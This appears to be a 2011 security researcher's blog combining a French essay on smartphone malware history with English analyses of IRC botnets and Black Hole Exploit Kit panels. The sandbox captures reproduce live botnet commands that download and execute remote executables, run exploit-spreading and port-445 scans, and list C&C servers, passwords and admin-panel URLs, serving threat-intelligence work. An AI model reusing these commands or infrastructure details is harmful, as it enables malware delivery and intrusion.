Sebdraven
Menaces des codes malveillants sur Smartphone (FR)

Article que j’ai écrit il y a un petit moment

Cet article se présentera en deux parties. La première partie présente un bref historique du sujet pour montrer que ces problématiques ne sont pas nouvelles
Dans une seconde partie, pourquoi depuis deux ans maintenant, il y a une explosion du nombre de codes malveillants sur mobile.
 

Historique:

La problématique des malware mobile n’est pas nouvelle. En effet, le premier malware à grande échelle date de 2004 sous l’OS Symbian de Nokia
Ce malware au doux nom de Cabir a infecté des centaines de milliers de téléphone. Il se propageait par Bluetooth et par sms.
Il avait tendance à appeler des numéros surtaxés qui se traduisait pour ses victimes par des factures très salées. Lors des championnats d’Europe d’Helsinki;
Le malware se propagea dans l’ensemble du stade, obligeant les autorités à monter un stand de désinfection avec l’aide de l’éditeur d’antivirus F-Secure.
Ce code malveillant s’installait suite à une validation de l’utilisateur étant massivement sollicité par Téléphone. Le malware avait les mêmes droits d’exécution que l’utilisateur (tiens tiens ça me rappelle un peu ce qui se passe aujourd’hui…) et ne pouvait être supprimé simplement.
A la même époque, il existait des malwares qui se positionnait au niveau du bootloader (endroit qui load l’OS après le Bios)du téléphone et l’empêchait le démarrage correct du téléphone le rendant inutilisable. Je passe aussi la partie mouchard pour récuperer les carnets de contacts via bluetooth (a une époque le bluetooth était activé et actif par défaut) Comme on peut le constater, la problématique n’est pas nouvelle que ce soit en terme de modèle de sécurité ou de protection. Qu’a-t-on appris ? Pas grand chose malheureusement…

Pourquoi ai je pris cet exemple ? Outre le fait que c’est la première tentative d’infection massive, c’est la première fois dans la téléphonie mobile ou un système d’exploitation est massivement installé sur les appareils et exploité par un code malveillant
 
Une des difficultés majeures des développeurs de malware était l’hétérogénéité des systèmes d’exploitation dans ce domaine. On peut même parler de firmware (microcode ne servant qu’un nombre limité de fonctions non extensible) propriétaire. Il y avait autant de firmware dans la nature que de constructeur. Donc niveau portabilité on a vu mieux. Et développer un malware sur un des firmware demandait un reverse engering complet sur une plateforme et architecture matérielle plus qu’obscure (on est loin à cette époque des plateformes ARM).
C’est une des raisons pour laquelle Symbian a eu autant de succès dans le domaine des malwares car enfin un système d’exploitation massivement installé par Nokia qui a l’époque était le leader en téléphonie mobile.

Ce succès se répète de la même manière pour Android et l’IOS d’Apple. L’homogénéisation du système d’exploitation et des frameworks de développements pour les application facilitent la prolifération de malware sur ces deux plateformes, surtout sur Android. Des études montrent que sur la multiplier par 100 en une année, le nombre de code malveillant sur cette plateforme.

Une “démocratisation” des malware sur mobile en particulier sur Android:

Les raisons de cette démocratisation et l’augmentation des codes malveillants sont assez simples si on regarde les points suivants:
    Tout d’abord, le noyaux d’Android est dérivé d’un kernel linux. Une Faille dans le kernel linux a beaucoup de chance de se retrouver dans le kernel android. De plus, il faut savoir qu’on trouve plus des failles liées au kernel sous Linux que sous Windows. Donc le kernel est bien plus vulnérable que ce qu’on veut bien laisser penser.
    De plus, Android embarque des applications souvent vulnérable notamment flashplayer d’adobe et là c’est le drame…
    Ensuite, la plateforme de développement Dalvik est très proche de Java (d’ailleurs ça vaut à Google quelques déboires juridiques avec Oracle), ce qui demande peu de         technicité dans le développement des applications notamment dans celle de codes malveillants, “suffit” d’être un développeur Java un peu débrouillard
    Il est possible d’installer des applications n’appartenant pas au Market de google.
    Et pour finir ,au travers du Market, certains codes malveillants passent aux travers des mailles du filet mis en place par Google.

Sur l’IOS les choses sont un peu plus compliquées, car le modèle d’Apple est bien plus restrictif et les failles découvertes sont difficilement exploitables. Sur un téléphone non “jail breacké” il est impossible d’installer une application qui n’est pas du market de Apple. Et les contrôles du market sont bien plus draconiens que celui de Google (Signature électronique, calcul d’intégrité, scans massif des applications)

De plus sur certains aspects, les téléphones mobiles sont plus intéressants que les ordinateurs:
    l’hyperconnectivité des objets (3G,WiFi,Bluetooth,USB…)
    Les possibilités d’écoutes
    Le types de données stockées: mails,agenda,contacts,données personnelles…
    Le nombre d’objet dans la nature au regard de leurs succès commerciaux

Les vecteurs de dispersion de malware sont donc multiples et augmentent le succès de la propagation:
    SMS
    Mails
    applications infectés
    page web
    USB sur les mobiles dont la carte SD est en masse storage
    Les code QR qui redirigent sur des URL permettant d’installer des applications malveillantes
    l’humain (la plupart des installations de ces applicaitions nécessite l’approbation de l’utilisateur pour s’installer)

Et la post exploitation est souvent la même:
    Appel vers des sms surtaxés
    Vol de données personnelles,de données bancaires (Et oui les gens payent avec leur mobile) et confidentielles
    Écoutes téléphoniques
    Géolocalisation des individus (Tiens tiens…) par borne GSM,GPS

Les failles sont nombreuses quelles soient applicatives ou système (lire l’article de Nicolas Ruff pour le SSTIC de 2011 sur faisant un état des lieux du sujet)

Ce petit aperçu montre donc que les téléphones mobiles sont entrain de devenir l’eldorado des développeurs de malware.

Le but était de cet article était de faire un petit rappel historique du sujet et ces grandes lignes.



Black Hole Exploit Kit 2.0 Panel

By day, I’ve added new domains that I found with google:

http://onlinetracksz.net/bhadmin.php

http://httpsites.org/bhadmin.php

http://onlinegreencm.org/bhadmin.php

http://onlinegiigii.com/bhadmin.php

http://onlinefishmw3bid.net/bhadmin.php

http://onlineliverss.org/bhadmin.php

http://onlinemooviii.com/bhadmin.php

http://onlinegiigii.net/bhadmin.php

http://62.109.12.39/bhadmin.php

http://httpsites.net/bhadmin.php

http://sauth-yandex.ru/bhadmin.php <- serveur down

http://onlinepainrs.com/bhadmin.php

http://onlinegreenguide.com/bhadmin.php

http://onlinepainrs.net/bhadmin.php

http://onlineliververs.net/bhadmin.php

http://online-moo-viii.net/bhadmin.php

http://onlinemaris.com/bhadmin.php

http://onlinegreenguide.net/bhadmin.php

http://httpblogs.com/bhadmin.php

http://onlinecodmw3buy.net/bhadmin.php

http://onlinemaris.net/bhadmin.php

http://onlinemooviii.net/bhadmin.php

http://oase2.net/bhadmin.php

http://www.money-yanbex.ru/bhadmin.php

http://31.184.244.9/bhadmin.php

http://onlinemoneysstock.org/bhadmin.php

http://onlinefundsgoods.org/bhadmin.php

http://livemoneysgoods.org/bhadmin.php

http://onlineincomegoods.org/bhadmin.php

http://newdomeninfo.info/bhadmin.php

http://onlineliververs.com/bhadmin.php

http://onlineliverss.com/bhadmin.php

http://onlineliverss.net/bhadmin.php

http://onlinecashsstt.org/bhadmin.php

http://internetmoneysstt.org/bhadmin.php

http://moneyinternetlovesff.info/bhadmin.php

http://livewindowsxpf4.info/bhadmin.php

http://onlinewinsphonessite.org/bhadmin.php

http://webstockcwo.info/bhadmin.php

http://internetwindowslive.info/bhadmin.php

http://theonlinewinsphones.org/bhadmin.php

http://webwindowsproc.info/bhadmin.php

http://internetwindowslows.com/bhadmin.php

http://moneydigitallovesff.info/bhadmin.php

http://internet-wins-phones.org/bhadmin.php

http://livewindowsproc.info/bhadmin.php

http://onlinewindowsxpf4site.info/bhadmin.php

http://webwindowslows.com/bhadmin.php

http://webbuildingstore.info/bhadmin.php

http://livemoneysstt.org/bhadmin.php

http://moneylivelovesff.info/bhadmin.php

http://stockonlinelovesff.info/bhadmin.php

http://moneyweblovesff.info/bhadmin.php

http://digitalwindowsproc.info/bhadmin.php

http://cashonlinelovesff.info/bhadmin.php

http://onlinemoneyssuv.info/bhadmin.php

http://onlinemicrosoftproc.info/bhadmin.php

http://onlinewindowsxpf4s.info/bhadmin.php

http://dollaronlinelovesff.info/bhadmin.php

http://digitalwinsphones.org/bhadmin.php

http://l2-pantheon.ru/bhadmin.php

http://onlinefinanses2f.info/bhadmin.php

http://internetstockcwo.info/bhadmin.php

This list is made a script with CasperJS.

With a IP geolocalisation:

IP,domaine_name,latitude_longitude ,Pays

31.184.244.9,onlinetracksz.net,24.0_54.0,RU

31.184.244.9,httpsites.org,24.0_54.0,RU

31.184.244.9,onlinegreencm.org,24.0_54.0,RU

31.184.244.9,onlinegiigii.com,24.0_54.0,RU

31.184.244.9,onlinefishmw3bid.net,24.0_54.0,RU

31.184.244.9,onlineliverss.org,24.0_54.0,RU

31.184.244.9,onlinemooviii.com,24.0_54.0,RU

31.184.244.9,onlinegiigii.net,24.0_54.0,RU

62.109.12.39,62.109.12.39,55.7522_37.6156,RU

31.184.244.9,httpsites.net,24.0_54.0,RU

DNS Resolution Failure: sauth-yandex.ru

31.184.244.9,onlinepainrs.com,24.0_54.0,RU

31.184.244.9,onlinegreenguide.com,24.0_54.0,RU

31.184.244.9,onlinepainrs.net,24.0_54.0,RU

31.184.244.9,onlineliververs.net,24.0_54.0,RU

31.184.244.9,online-moo-viii.net,24.0_54.0,RU

31.184.244.9,onlinemaris.com,24.0_54.0,RU

31.184.244.9,onlinegreenguide.net,24.0_54.0,RU

31.184.244.9,httpblogs.com,24.0_54.0,RU

31.184.244.9,onlinecodmw3buy.net,24.0_54.0,RU

31.184.244.9,onlinemaris.net,24.0_54.0,RU

31.184.244.9,onlinemooviii.net,24.0_54.0,RU

173.45.252.44,oase2.net,38.6446_-90.2533,US

92.63.106.133,www.money-yanbex.ru,60.0_100.0,RU

31.184.244.9,31.184.244.9,24.0_54.0,RU

31.184.244.219,onlinemoneysstock.org,24.0_54.0,RU

31.184.244.219,onlinefundsgoods.org,24.0_54.0,RU

31.184.244.219,livemoneysgoods.org,24.0_54.0,RU

31.184.244.219,onlineincomegoods.org,24.0_54.0,RU

DNS Resolution Failure: newdomeninfo.info

31.184.244.9,onlineliververs.com,24.0_54.0,RU

31.184.244.9,onlineliverss.com,24.0_54.0,RU

31.184.244.9,onlineliverss.net,24.0_54.0,RU

31.184.244.219,onlinecashsstt.org,24.0_54.0,RU

DNS Failure: onlinecashsstt.org

DNS Failure: internetmoneysstt.org

69.43.161.151,moneyinternetlovesff.info,-27.0_133.0,US

31.184.244.219,livewindowsxpf4.info,24.0_54.0,RU

31.184.244.219,onlinewinsphonessite.org,24.0_54.0,RU

141.8.224.162,webstockcwo.info,47.0_8.0,CH

DNS Failure: internetwindowslive.info

31.184.244.219,theonlinewinsphones.org,24.0_54.0,RU

31.184.244.219,webwindowsproc.info,24.0_54.0,RU

31.184.244.219,internetwindowslows.com,24.0_54.0,RU

DNS Failure: moneydigitallovesff.info

31.184.244.219,internet-wins-phones.org,24.0_54.0,RU

31.184.244.219,livewindowsproc.info,24.0_54.0,RU

31.184.244.219,onlinewindowsxpf4site.info,24.0_54.0,RU

31.184.244.219,webwindowslows.com,24.0_54.0,RU

31.184.244.219,webbuildingstore.info,24.0_54.0,RU

DNS Failure: livemoneysstt.org

DNS Failure: moneylivelovesff.info

69.43.161.161,stockonlinelovesff.info,-27.0_133.0,US

69.43.161.156,moneyweblovesff.info,-27.0_133.0,US

31.184.244.219,digitalwindowsproc.info,24.0_54.0,RU

DNS Failure: cashonlinelovesff.info

31.184.244.219,onlinemoneyssuv.info,24.0_54.0,RU

31.184.244.219,onlinemicrosoftproc.info,24.0_54.0,RU

31.184.244.219,onlinewindowsxpf4s.info,24.0_54.0,RU

69.43.161.161,dollaronlinelovesff.info,-27.0_133.0,US

31.184.244.219,digitalwinsphones.org,24.0_54.0,RU

62.109.23.82,l2-pantheon.ru,59.8944_30.2642,RU

31.184.244.219,onlinefinanses2f.info,24.0_54.0,RU

141.8.224.162,internetstockcwo.info,47.0_8.0,CH

So It’s the same IP… We have 3 servers different at this moment that is possible to find with google !

#malware IRC Bot C&C hosted by Chinanet Hostmaster

Virus Total Link: 

http://www.virustotal.com/file-scan/report.html?id=e9558fa3a42230a4f64b72b3025667736a79ebe242864cb1ce4f12b29cb9f546-1310975803

connexion: 60.165.98.198 port 8685

dl this file: http://pastebin.com/iremNb0A

NICK FRA|XP|SP3|1|95430937

PING :6E481808

USER SP3-074 * 0 :SEBDRAVEN

PONG 6E481808

:….. 004 FRA|XP|SP3|1|95430937    

:….. 005 FRA|XP|SP3|1|95430937  :

:….. 005 FRA|XP|SP3|1|95430937  :

:….. 005 FRA|XP|SP3|1|95430937  :

JOIN #blue5 

:FRA|XP|SP3|1|95430937!SP3-074@90.2.0.33 JOIN :#blue5

:….. 332 FRA|XP|SP3|1|95430937 #blue5 :|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:16778/logo.gif 0 -s|.shttp ftp://ccc:1@119.188.6.227:5809/tyf.jpg lpdd.exe -s|.asc svrsvc_XXX 100 5 9999 1 -b -e -r -s|.asc svrsvc_XXX 20 5 9999 0 -b -r -s|.join #sd5 -s|.cjoin 1 CHN #cn -s

:….. 333 FRA|XP|SP3|1|95430937 #blue5 ccc 1310895808

:….. 353 FRA|XP|SP3|1|95430937 @ #blue5 :FRA|XP|SP3|1|95430937 

:….. 366 FRA|XP|SP3|1|95430937 #blue5 :

JOIN #blue5 

JOIN #blue5 

JOIN #sd5 

:FRA|XP|SP3|1|95430937!SP3-074@90.2.0.33 JOIN :#sd5

:….. 353 FRA|XP|SP3|1|95430937 @ #sd5 :FRA|XP|SP3|1|95430937 

:….. 366 FRA|XP|SP3|1|95430937 #sd5 :

PING :…..

PONG …..

PING :…..

This C&C server is up since february 2011…http://www.exposedbotnets.com/2011/02/pantylostmooocom-botnet-hosted-in-china.html
#malware DNS Traffic on love.swastikano.net

http://www.virustotal.com/file-scan/report.html?id=5aad32dd4f47d3f05618bbdf689a0f7542e16b0d4c2bab77f7dc6b71831ca2c6-1310694901

And Anubis can’t execute it

P`………..love

swastikano.net…..P`………..love

swastikano.net…..P`………..love

swastikano.net…………..X.FE=it53egOKxXS7Vl50Hl9Mp6D0xLu7B8xauTMycJ2VfUVxSdVtmBWFtGUpaLpQj0AQdRI5

#malware IRC Bot C&C hosted by Radore Hosting Telk. Hizm. San. Tic. Ltd. Sti

http://www.virustotal.com/file-scan/report.html?id=6f05fd97d71839c483d14be95f5022c0e90f1d5aa7985aae8ea88f0d4c8b5d1a-1310983032

It’s UPX packed. But Malware Analyses tools crash while the analysis

After executing on sandbox

The trojan connected on 46.45.164.230 on port 81

NICK [N00_FRA_XP_1295331]..A

USER SP3-545 * 0 :SEBDRAVEN

:log.id.sys 001 [N00_FRA_XP_1295331]__A :Cisco          

:log.id.sys 005 [N00_FRA_XP_1295331]__A                                                                                                                                          

:log.id.sys 422 [N00_FRA_XP_1295331]__A :                    

:[N00_FRA_XP_1295331]__A MODE [N00_FRA_XP_1295331]__A :+i

MODE [N00_FRA_XP_1295331]..A -ix

:log.id.sys 401 [N00_FRA_XP_1295331]__A [N00_FRA_XP_1295331]..A :                    

JOIN #p1 ….

MODE [N00_FRA_XP_1295331]..A -ix

JOIN #p1 ….

:[N00_FRA_XP_1295331]__A!SP3-545@90.2.0.33 JOIN :#p1

:log.id.sys 332 [N00_FRA_XP_1295331]__A #p1 :.asc -S -s |.http http://46.45.164.228/pp.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.asc exp_all 10 5 0 -a -r -e 

:log.id.sys 333 [N00_FRA_XP_1295331]__A #p1 j 1311159067

:log.id.sys 353 [N00_FRA_XP_1295331]__A @ #p1 :[N00_FRA_XP_1295331]__A 

:log.id.sys 366 [N00_FRA_XP_1295331]__A #p1 :End of /NAMES list.

:log.id.sys 401 [N00_FRA_XP_1295331]__A [N00_FRA_XP_1295331]..A :                    

PRIVMSG #ps :HTTP SET http://46.45.164.228/pp.exe

:log.id.sys 401 [N00_FRA_XP_1295331]__A #ps :                    

PRIVMSG [N00_FRA_XP_1295l.@ :scan; Sequential Port Scan started on 90.2.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

:log.id.sys 401 [N00_FRA_XP_1295331]__A [N00_FRA_XP_1295l.@ :                    

PRIVMSG [N00_FRA_XP_1295l.@ :scan; Random Port Scan started on 90.2.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.

:log.id.sys 401 [N00_FRA_XP_1295331]__A [N00_FRA_XP_1295l.@ :                    

PRIVMSG [N00_FRA_XP_1295l.@ :scan; Sequential Port Scan started on 192.168.1.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.

:log.id.sys 401 [N00_FRA_XP_1295331]__A [N00_FRA_XP_1295l.@ :                    

PRIVMSG [N00_FRA_XP_1295l.@ :scan; Random Port Scan started on 90.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.

:log.id.sys 401 [N00_FRA_XP_1295331]__A [N00_FRA_XP_1295l.@ :                    

MODE #p1 -ix

:log.id.sys 482 [N00_FRA_XP_1295331]__A #p1 :                           

PING :log.id.sys

PONG log.id.sys

PING :log.id.sys

PONG log.id.sys

PING :log.id.sys

PONG log.id.sys

Ruskill IRC botnet

209.200.50.75 3800

PASS hax0r

KCIK n{FR|XPa}cbzqnsn

RSSR cbzqnsn 0 0 :cbzqnsn

:IRC!IRC@hub.us.com PRIVMSG n{FR|XPa}cbzqnsn :.VERSION.

:hub.us.com 001 n{FR|XPa}cbzqnsn :us, n{FR|XPa}cbzqnsn!cbzqnsn@

:

:hub.us.com 005 n{FR|XPa}cbzqnsn 

:n{FR|XPa}cbzqnsn!cbzqnsn@ JOIN :#dpi

:hub.us.com 332 n{FR|XPa}cbzqnsn #dpi :.mod pdef on .j #3

:hub.us.com 333 n{FR|XPa}cbzqnsn #dpi ND26 1309655092

:hub.us.com 353 n{FR|XPa}cbzqnsn @ #dpi :n{FR|XPa}cbzqnsn 

…………………………………………………………….

SEND #ng ng00

:n{FR|XPa}cbzqnsn!cbzqnsn@ JOIN :#ng

:hub.us.com 332 n{FR|XPa}cbzqnsn #ng :.dl http://31.184.237.126/43kk.exe .dl http://31.184.237.98/dqkk.exe .j -c US #us .dl http://31.184.237.98/bnetkk.exe

:hub.us.com 333 n{FR|XPa}cbzqnsn #ng ND26 1309743570

:hub.us.com 353 n{FR|XPa}cbzqnsn @ #ng :n{FR|XPa}cbzqnsn 

…………………………………………………………….

SEND #3 

:hub.us.com 471 n{FR|XPa}cbzqnsn #3 :Cannot join channel (+l)

PRIVMSG #p :[PDef+]: Detected process “C:\WINDOWS\Explorer.EXE” sending an IRC packet to server 59.53.91.168:3321.

Ruskills Analysises IRC bot

I analyse this malware: http://www.virustotal.com/file-scan/report.html?id=c3eabd68bb224f23bf6b9d9ca5194e873fc85bdfe9279e18ce1e6d545196668d-1309219809

First step connexion IRC to :

123.183.217.32 5943

PASS eee

KCIK rxjdv

rssr uqqks “” “sdhk” :uqqks

JOIN :#dpi

Second step: dowload 2 malware : http://31.184.237.110/200ki93hndx.exe

and  http://img105.herosh.com/2011/06/27/94681403.gif

query to api.wipmania.com

Theses malwares connect : 

123.183.217.32 5101

PASS hax0r

KCIK n{FR|XPa}kltffcq

RSSR kltffcq 0 0 :kltffcq

:n{FR|XPa}kltffcq!kltffcq@* JOIN :#ngme

:hub.us.com 332 n{FR|XPa}kltffcq #ngme :.mod pdef on .mod usbi on .dl hxxp://31.184.237.110/bntr.exe .dl hxxp://31.184.237.110/20ms.exe .dl hxxp://31.184.237.110/dl740220.exe

:hub.us.com 333 n{FR|XPa}kltffcq #ngme minder35 1309294978

:hub.us.com 353 n{FR|XPa}kltffcq @ #ngme :n{FR|XPa}kltffcq 

Third connexion: 115.239.230.68

PASS laorosr

KCIK [N00_FRA_XP_1860530]..@

rssr SP3-286 * 0 :SEBDRAVEN

:IRC!IRC@hub.us.com PRIVMSG [N00_FRA_XP_1860530]___ :.VERSION.

:hub.us.com 001 [N00_FRA_XP_1860530]___ :us, [N00_FRA_XP_1860530]___!SP3-286@*

:

:hub.us.com 005 [N00_FRA_XP_1860530]___ 

:[N00_FRA_XP_1860530]___!SP3-286@APuteaux-753-1-17-69.w90-44.abo.wanadoo.fr JOIN :#dpi

:hub.us.com 332 [N00_FRA_XP_1860530]___ #dpi :finito

:hub.us.com 333 [N00_FRA_XP_1860530]___ #dpi ms 1309279723

:hub.us.com 353 [N00_FRA_XP_1860530]___ @ #dpi :[N00_FRA_XP_1860530]___ 

…………………………………………………………….

MODE [N00_FRA_XP_1860530]..@ -ix

send #j,#Ma oooo

:[N00_FRA_XP_1860530]___!SP3-286@* JOIN :#j

:hub.us.com 332 [N00_FRA_XP_1860530]___ #j :.asc -S|.r.getfile -S|.r.getfile hxxp://31.184.237.110/200ki93hndx.exe C:\nfss32.exe 1 -s|.http hxxp://31.184.237.110/dc82.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a

:hub.us.com 333 [N00_FRA_XP_1860530]___ #j minder76 1309252381

:hub.us.com 353 [N00_FRA_XP_1860530]___ @ #j :[N00_FRA_XP_1860530]___ 

…………………………………………………………….

:[N00_FRA_XP_1860530]___!SP3-286@* JOIN :#Ma

:hub.us.com 353 [N00_FRA_XP_1860530]___ @ #Ma :[N00_FRA_XP_1860530]___ 

…………………………………………………………….

PRRVMSG #i :HTTP SET hxxp://31.184.237.110/dc82.exe

PRRVMSG [N00_FRA_XP_1860..@ : Random Port Scan started on 90.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

PRRVMSG [N00_FRA_XP_1860..@ : Random Port Scan started on 90.44.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

PRRVMSG [N00_FRA_XP_1860..@ : Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.

PRRVMSG [N00_FRA_XP_1860..@ : Sequential Port Scan started on 192.168.1.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.

PRRVMSG [N00_FRA_XP_1860..@ : Sequential Port Scan started on 192.0.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

PING :hub.us.com

PONG hub.us.com

:ms!master@ssssss.us TOPIC #dpi :.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c

:ms!master@ssssss.us TOPIC #dpi :finito

PRRVMSG #dpi : Scanner thread stopped. (105 thread(s) stopped.)

PRRVMSG #dpi : Random Port Scan started on 192.x.x.x:445 with a delay of 3 seconds for 0 minutes using 25 threads.

PRRVMSG #dpi : Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 25 threads.

PRRVMSG #dpi : Sequential Port Scan started on 192.168.1.0:445 with a delay of 3 seconds for 0 minutes using 25 threads.

A cgi bin is called on dns name : pppppnipponp.r7m.us on IP 98.126.35.112

GET /cgi-bin/p.cgi HTTP/1.1

Host: ppppnipponp.r7m.us

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 28 Jun 2011 13:49:04 GMT

Server: Apache/2.2.3 (CentOS)

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8

This cgi record your hostname and your IP

a geolocalisation to define the country is lauched :

GET /geo/countrybyip.php HTTP/1.1

User-Agent: User Agent

Host: bestphotocard.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 28 Jun 2011 21:44:26 GMT

Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1

X-Powered-By: PHP/5.3.5

Content-Length: 2

Content-Type: text/html

FR

SMTP Traffic is launched on 74.6.136.244 and 65.55.37.120

And supiscious traffic on 209.90.137.220 on port 1199

And make traffic http on the page hxxp://www.lonalise.fr/agrandissement-penis/13-vigrx-plus-agrandissement-du-penis.html

Unfurtunatly, Anubis can’t execute correctly all sequences.

Here the result of malware analyses: http://pastebin.com/a1Urd0nT

Palevo Analysises

On my honeypot, I find this kind of Palevo Malware: 

http://www.virustotal.com/file-scan/report.html?id=0b3a61404b75034f42feb3187cf02f007b637ee7f3469a67701c0a6953dba552-1308647150

On Anubis, I’ve no result. So I launch this on my Sandox.

The first step, the malware connect to dl.ka3ek.com (IP 209.200.50.90) and try to connect on C&C IRC 

PASS eee

KCIK xbeaifpy

rssr scuroqqc “” “xlk” :scuroqqc

This C&C don’t useless

The second step it’s a second C&C IRC on the same server but another configuration connexion on port 1038

PASS eee
KCIK yrutsqcl
rssr gtpivxpn “” “jeg” :gtpivxpn:IRC!IRC@hub.us.com PRIVMSG yrutsqcl :.VERSION.:hub.us.com 001 yrutsqcl :us, yrutsqcl!gtpivxpn@*::hub.us.com 005 yrutsqcl :yrutsqcl!gtpivxpn@* JOIN :#dpi:hub.us.com 332 yrutsqcl #dpi :!dl http://31.184.237.105/haydar.exe cadqj.exe 1:hub.us.com 333 yrutsqcl #dpi ND29 1308617537:hub.us.com 353 yrutsqcl @ #dpi :yrutsqcl …………………………………………………………….PRIVMSG #dpi :Done..

The injector dl another malware on http :

GET /haydar.exe HTTP/1.1User-Agent: MozillaHost: 31.184.237.105
HTTP/1.1 200 OKDate: Tue, 21 Jun 2011 22:10:29 GMTServer: Apache/2.2.17 (CentOS)Last-Modified: Sat, 18 Jun 2011 09:06:55 GMTETag: “2ea00e6-30000-4a5f8d2dcc9c0”Accept-Ranges: bytesContent-Length: 196608Connection: closeContent-Type: application/octet-stream

This malware is executed and launch a dns query on ng.marketallone.comIP’s addresse are : 115.239.230.68,123.183.217.32,209.200.40.75,209.200.40.90 .The last IP adress is the IRC C&C described at top.
api.wipmania.com is executed:
GET / HTTP/1.1User-Agent: Mozilla/4.0Host: api.wipmania.com
HTTP/1.1 200 OKServer: nginxDate: Tue, 21 Jun 2011 21:03:53 GMTContent-Type: text/htmlContent-Length: 18Connection: closeSet-Cookie: uid=1fuqNE4BBzldGhJtCNEOAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/
<br>FR

On 115.239.230.68, an IRC Connection is created on port 3800:

PASS hax0rKCIK

n{FR|XPa}jcosxvrRSSR jcosxvr 0 0 :jcosxvr:IRC!IRC@hub.us.com

PRIVMSG n{FR|XPa}jcosxvr :.VERSION.:hub.us.com 001 n{FR|XPa}jcosxvr :us, n{FR|XPa}jcosxvr!jcosxvr@*::hub.us.com 005 n{FR|XPa}jcosxvr :n{FR|XPa}jcosxvr!jcosxvr@* JOIN :#dpi:hub.us.com 332 n{FR|XPa}jcosxvr #dpi :.mod pdef off:hub.us.com 333 n{FR|XPa}jcosxvr #dpi ND23 1308152727:hub.us.com 353 n{FR|XPa}jcosxvr @ #dpi :n{FR|XPa}jcosxvr …………………………………………………………….

SEND #ng ng00:n{FR|XPa}jcosxvr!jcosxvr@*

JOIN :#ng:hub.us.com 332 n{FR|XPa}jcosxvr #ng :.dl http://31.184.237.100/mss71.exe .dl http://31.184.237.98/dqq1.exe .j -c US #us:hub.us.com 333 n{FR|XPa}jcosxvr #ng ND29 1308617992:hub.us.com 353 n{FR|XPa}jcosxvr @ #ng :n{FR|XPa}jcosxvr …………………………………………………………….

PRIVMSG #ng :[d=”http://31.184.237.100/mss71.exe” s=”155648 bytes”] Executed file “C:\Documents and Settings\sebdraven\Application Data\1.tmp” - Download retries: 0
PRIVMSG #ng :[d=”http://31.184.237.98/dqq1.exe” s=”118784 bytes”] Executed file “C:\Documents and Settings\sebdraven\Application Data\2.tmp” - Download retries: 0

Two malwares are downloaded:

1.tmp is the same that my example

And 2.tmp is another kind http://www.virustotal.com/file-scan/report.html?id=b8d263d80762a6295f0d7c55e7c9c8a7be1365c65dc5a93ba209f1a46974740f-1308591448

the first dowload: 

GET /mss71.exe HTTP/1.1User-Agent: Mozilla/4.0Host: 31.184.237.100
HTTP/1.1 200 OKDate: Tue, 21 Jun 2011 20:59:33 GMTServer: Apache/2Last-Modified: Sat, 18 Jun 2011 09:13:59 GMTETag: “4030071-26000-4a5f8ec2283c0”Accept-Ranges: bytesContent-Length: 155648Content-Type: application/x-msdownload

The second is :

GET /dqq1.exe HTTP/1.1User-Agent: Mozilla/4.0Host: 31.184.237.98
HTTP/1.1 200 OKDate: Tue, 21 Jun 2011 20:59:35 GMTServer: Apache/2Last-Modified: Sat, 18 Jun 2011 09:12:08 GMTETag: “403004f-1d000-4a5f8e584ca00”Accept-Ranges: bytesContent-Length: 118784Content-Type: application/x-msdownload
And the last step is a DNS query to haaaaaaaa.ishtiben.com with IP 59.53.91.168.
And a IRC C&C is created again: 
PASS laorosrKCIK [N00_FRA_XP_1371671]..@rssr SP3-523 * 0 :SEBDRAVEN:hub.us.com 001 [N00_FRA_XP_1371671]___ :us, [N00_FRA_XP_1371671]___!SP3-523@*::hub.us.com 005 [N00_FRA_XP_1371671]___ :[N00_FRA_XP_1371671]___!SP3-523@* JOIN :#dpi:hub.us.com 332 [N00_FRA_XP_1371671]___ #dpi :f:hub.us.com 333 [N00_FRA_XP_1371671]___ #dpi ND49 1307406706:hub.us.com 353 [N00_FRA_XP_1371671]___ @ #dpi :[N00_FRA_XP_1371671]___ …………………………………………………………….MODE [N00_FRA_XP_1371671]..@ -ix
send #s,#Ma oooo:[N00_FRA_XP_1371671]___!SP3-523@* JOIN :#s:hub.us.com 332 [N00_FRA_XP_1371671]___ #s :.asc -S|.http http://31.184.237.97/z.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a:hub.us.com 333 [N00_FRA_XP_1371671]___ #s ND94 1308617651:hub.us.com 353 [N00_FRA_XP_1371671]___ @ #s :[N00_FRA_XP_1371671]___ …………………………………………………………….:[N00_FRA_XP_1371671]___!SP3-523@* JOIN :#Ma:hub.us.com 353 [N00_FRA_XP_1371671]___ @ #Ma :[N00_FRA_XP_1371671]___ …………………………………………………………….PRRVMSG #i :HTTP SET http://31.184.237.97/z.exe
PRRVMSG [N00_FRA_XP_1371..@ : Trying to get external IP.
PRRVMSG [N00_FRA_XP_1371..@ : Could not parse external IP.
PRRVMSG [N00_FRA_XP_1371..@ : Trying to get external IP.
PRRVMSG [N00_FRA_XP_1371..@ : Random Port Scan started on 90.44.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
